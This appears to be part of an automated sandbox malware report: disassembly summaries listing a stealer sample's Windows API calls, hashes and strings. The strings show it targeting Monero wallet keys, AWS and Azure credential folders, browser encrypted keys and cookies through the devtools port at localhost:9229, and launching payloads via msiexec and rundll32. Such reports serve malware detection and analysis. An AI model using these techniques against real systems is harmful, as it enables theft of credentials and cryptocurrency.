                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 07c05dd3fb5a8ce8a5b2d7ce0f5a53b1b05670d9933a00ec7b52261661948850
                                    • Instruction ID: 9cd60cece2bcc9bac8a94036616745142ef1650a38068e820642446c9c86724d
                                    • Opcode Fuzzy Hash: 07c05dd3fb5a8ce8a5b2d7ce0f5a53b1b05670d9933a00ec7b52261661948850
                                    • Instruction Fuzzy Hash: DB12DB72920118ABCF15EBA0DCAAFEEB379BF14700F104599F10666191EF706B48DFA5
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C8D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C8D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D308
                                    • lstrcat.KERNEL32(?,00CA1570), ref: 00C8D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D32A
                                    • lstrcat.KERNEL32(?,00CA1574), ref: 00C8D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D34C
                                    • lstrcat.KERNEL32(?,00CA1578), ref: 00C8D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D36E
                                    • lstrcat.KERNEL32(?,00CA157C), ref: 00C8D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D390
                                    • lstrcat.KERNEL32(?,00CA1580), ref: 00C8D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D3B2
                                    • lstrcat.KERNEL32(?,00CA1584), ref: 00C8D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D3D4
                                    • lstrcat.KERNEL32(?,00CA1588), ref: 00C8D3E3
                                      • Part of subcall function 00C9AB30: lstrlen.KERNEL32(00C84F55,?,?,00C84F55,00CA0DDF), ref: 00C9AB3B
                                      • Part of subcall function 00C9AB30: lstrcpy.KERNEL32(00CA0DDF,00000000), ref: 00C9AB95
                                    • lstrlen.KERNEL32(?), ref: 00C8D42A
                                    • lstrlen.KERNEL32(?), ref: 00C8D439
                                      • Part of subcall function 00C9AD80: StrCmpCA.SHLWAPI(00000000,00CA1568,00C8D2A2,00CA1568,00000000), ref: 00C9AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 1c732d7e4ed1ed391462ef261d76ea67842fca8b3af9b95173d77ddef14cb122
                                    • Instruction ID: b81cea4b4701ceee3b75a8c7fe744562353eaaaa52c90bbb63b70fbee2743f9d
                                    • Opcode Fuzzy Hash: 1c732d7e4ed1ed391462ef261d76ea67842fca8b3af9b95173d77ddef14cb122
                                    • Instruction Fuzzy Hash: 17E11072914208ABCF04FBA0DD9AEEE7379AF54301F104554F607B64A1DF31AE08EBA5
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0152CF40,00000000,?,00CA1544,00000000,?,?), ref: 00C8CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C8CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C8CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C8CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C8CBD9
                                    • StrStrA.SHLWAPI(?,0152CF58,00CA0B56), ref: 00C8CBF7
                                    • StrStrA.SHLWAPI(00000000,0152CF70), ref: 00C8CC1E
                                    • StrStrA.SHLWAPI(?,0152D1F8,00000000,?,00CA1550,00000000,?,00000000,00000000,?,01528A50,00000000,?,00CA154C,00000000,?), ref: 00C8CDA2
                                    • StrStrA.SHLWAPI(00000000,0152D218), ref: 00C8CDB9
                                      • Part of subcall function 00C8C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C8C971
                                      • Part of subcall function 00C8C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C8C97C
                                    • StrStrA.SHLWAPI(?,0152D218,00000000,?,00CA1554,00000000,?,00000000,01528B80), ref: 00C8CE5A
                                    • StrStrA.SHLWAPI(00000000,015289D0), ref: 00C8CE71
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B47), ref: 00C8CA43
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B4B), ref: 00C8CA57
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B4E), ref: 00C8CA78
                                    • lstrlen.KERNEL32(00000000), ref: 00C8CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 00C8CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 83adb8998dd2aa1fdea00e3827a13e0f0059c8d8e6c8619f7da30e945b2c06f7
                                    • Instruction ID: 783820f7035c0c7b2b914e8ad31d74d63b082efe4ccf23d5a0c0ba022d7a2cfc
                                    • Opcode Fuzzy Hash: 83adb8998dd2aa1fdea00e3827a13e0f0059c8d8e6c8619f7da30e945b2c06f7
                                    • Instruction Fuzzy Hash: F6E1FF71910208ABCF14EBE4DCA6FEEB779AF54300F004599F106A7191EF316A49DFA5
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,0152B040,00000000,00020019,00000000,00CA05BE), ref: 00C98534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C985B6
                                    • wsprintfA.USER32 ref: 00C985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C9860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98629
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 2cddfcf5407a190e7d3f05bc1671d78726b2e97c49d01417a2a713ec60852965
                                    • Instruction ID: f66cea47cffa2174459139c5017c51006ece37de966f4dd9b5fa413f81612e78
                                    • Opcode Fuzzy Hash: 2cddfcf5407a190e7d3f05bc1671d78726b2e97c49d01417a2a713ec60852965
                                    • Instruction Fuzzy Hash: E381FC7191021CABDB24DB54DD95FEA77B8BB48700F1086D8F209A6180DF716B88DFE0
                                    APIs
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C95000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00C9501D
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94B7C
                                      • Part of subcall function 00C94B60: FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C9508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00C950A9
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                      • Part of subcall function 00C94B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                      • Part of subcall function 00C94B60: FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C95118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C95135
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94C00
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA08D3), ref: 00C94C15
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94C32
                                      • Part of subcall function 00C94B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00C94C6E
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,0152E3A0), ref: 00C94C9A
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,00CA0FE0), ref: 00C94CAC
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,?), ref: 00C94CC0
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,00CA0FE4), ref: 00C94CD2
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,?), ref: 00C94CE6
                                      • Part of subcall function 00C94B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00C94CFC
                                      • Part of subcall function 00C94B60: DeleteFileA.KERNEL32(?), ref: 00C94D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 871ca0614815765e4a30aa92922e5bcd2150ebd951411c4bfff59fd7fc1c159d
                                    • Instruction ID: 5aaa559713385faaed783d9a9ed7e5fc57c106e042fbd2ea00d860d6f462fcfb
                                    • Opcode Fuzzy Hash: 871ca0614815765e4a30aa92922e5bcd2150ebd951411c4bfff59fd7fc1c159d
                                    • Instruction Fuzzy Hash: 1641C4BA94430867DF14F7B0EC9BFED33385B65705F004564B649660C1EEB46BC89B92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C991FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 53f8cf3574831659e12750ab9d08128f0aed6ffaccad1ab3fdb8362ea94da176
                                    • Instruction ID: 65863991cf0bbc33e15dfb3c08d94643d71f1b882077de234ec5ec32afa85cfe
                                    • Opcode Fuzzy Hash: 53f8cf3574831659e12750ab9d08128f0aed6ffaccad1ab3fdb8362ea94da176
                                    • Instruction Fuzzy Hash: F371BE75914308ABDB14EFE4EC89FEEB7B8FB48701F108508F616A7290DB74A905DB60
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C93415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C935AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C9373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 9c1c3c4fc9949feea500c61e74afaac75744d95a7ce24b80aa8b73cf5eaf6318
                                    • Instruction ID: a7c40140d95cc5303341114833b6963fdfd4b244c07a192822d22b337519900a
                                    • Opcode Fuzzy Hash: 9c1c3c4fc9949feea500c61e74afaac75744d95a7ce24b80aa8b73cf5eaf6318
                                    • Instruction Fuzzy Hash: 65120D72910108ABCF18FBA0DDAAFEDB739AF14300F504599F10666192EF346B49DFA5
                                    APIs
                                      • Part of subcall function 00C89A50: InternetOpenA.WININET(00CA0AF6,00000001,00000000,00000000,00000000), ref: 00C89A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00C89CAF
                                    • lstrcat.KERNEL32(?,00CA12C4), ref: 00C89CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00C89CD5
                                    • lstrcat.KERNEL32(?,00CA12C8), ref: 00C89CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00C89CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00C89D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00C89D17
                                    • lstrlen.KERNEL32(00000000), ref: 00C89D26
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: be2e1873fd08a1367dbad5f8085d3b7e8eed4685a3921492f596fb312e5f870b
                                    • Instruction ID: 4daa492a860acb858582de3f4d6f30fc9025a811a66d8088f067a0146445759a
                                    • Opcode Fuzzy Hash: be2e1873fd08a1367dbad5f8085d3b7e8eed4685a3921492f596fb312e5f870b
                                    • Instruction Fuzzy Hash: 18518371910608ABCB14FBE0EC99FEE7778AF44305F444658F60AA7091EF30AA49DF65
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C862D0: InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                      • Part of subcall function 00C862D0: StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                      • Part of subcall function 00C862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                      • Part of subcall function 00C862D0: HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                      • Part of subcall function 00C862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                      • Part of subcall function 00C862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95568
                                    • lstrlen.KERNEL32(00000000), ref: 00C9557F
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00C955B4
                                    • lstrlen.KERNEL32(00000000), ref: 00C955D3
                                    • lstrlen.KERNEL32(00000000), ref: 00C955FE
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 41a6021b97877690f70074b2f9f1be9aaaa655e6d94801cad02b1b5b39fc0809
                                    • Instruction ID: 50fa6d682904a84a9bc2d62d82a54492c2f10457174d2a320ac3226db494dd00
                                    • Opcode Fuzzy Hash: 41a6021b97877690f70074b2f9f1be9aaaa655e6d94801cad02b1b5b39fc0809
                                    • Instruction Fuzzy Hash: D3511D30914108EBCF14FFA0DDAAAED7779AF10341F504468F90A57592EF30AB45EBA6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a1d5f6a54e57ec42b28ae16ca1ea783fa3c28c679c05cb56438e3a6de59caed9
                                    • Instruction ID: fc4a734ab1d74831cfa42299b2b6059c8c3d0c8aded39e619a7b6d1e5e87f215
                                    • Opcode Fuzzy Hash: a1d5f6a54e57ec42b28ae16ca1ea783fa3c28c679c05cb56438e3a6de59caed9
                                    • Instruction Fuzzy Hash: 9FC1B2B6900219ABCF14EF60DC9EFEE77B8BF54304F044598F509A7251EA70AA84DF90
                                    APIs
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C9453C
                                    • lstrcat.KERNEL32(?,0152DE78), ref: 00C9455B
                                    • lstrcat.KERNEL32(?,?), ref: 00C9456F
                                    • lstrcat.KERNEL32(?,0152CE50), ref: 00C94583
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F20: GetFileAttributesA.KERNEL32(00000000,?,00C81B94,?,?,00CA577C,?,?,00CA0E22), ref: 00C98F2F
                                      • Part of subcall function 00C8A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C8A489
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C99550: GlobalAlloc.KERNEL32(00000000,00C9462D,00C9462D), ref: 00C99563
                                    • StrStrA.SHLWAPI(?,0152DE90), ref: 00C94643
                                    • GlobalFree.KERNEL32(?), ref: 00C94762
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                      • Part of subcall function 00C8A210: LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                      • Part of subcall function 00C8A210: LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C946F3
                                    • StrCmpCA.SHLWAPI(?,00CA08D2), ref: 00C94710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C94722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C94735
                                    • lstrcat.KERNEL32(00000000,00CA0FA0), ref: 00C94744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 9ea9887afacc713212333133ca32de4605e99eace0a05bca5284b18596b8b3d2
                                    • Instruction ID: aa0acf88b1445feefcbff8526fa4c9a7bf608acdeb3e6e8982d70968d948d715
                                    • Opcode Fuzzy Hash: 9ea9887afacc713212333133ca32de4605e99eace0a05bca5284b18596b8b3d2
                                    • Instruction Fuzzy Hash: CF7164B6900208ABDF14EBE0ED99FDE7379AB89304F044598F60597181EA34EB49DF91
                                    APIs
                                      • Part of subcall function 00C812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C812B4
                                      • Part of subcall function 00C812A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C812BB
                                      • Part of subcall function 00C812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C812D7
                                      • Part of subcall function 00C812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C812F5
                                      • Part of subcall function 00C812A0: RegCloseKey.ADVAPI32(?), ref: 00C812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8134F
                                    • lstrlen.KERNEL32(?), ref: 00C8135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00C81377
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C81465
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: d8a08a3ca4b3125637a55d514dcde1bca2a40f0e01446c578e4b4aae04e52f62
                                    • Instruction ID: b572d938fc9d2d933781d33fab71d5d9fc8e591f470271f6687f852e70bdf270
                                    • Opcode Fuzzy Hash: d8a08a3ca4b3125637a55d514dcde1bca2a40f0e01446c578e4b4aae04e52f62
                                    • Instruction Fuzzy Hash: E65122B2D502199BCF15FB60DD96EED737CAB54300F4045E8B60A62092EE306B89DFA5
                                    APIs
                                    • InternetOpenA.WININET(00CA0AF6,00000001,00000000,00000000,00000000), ref: 00C89A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C89AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00C89AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
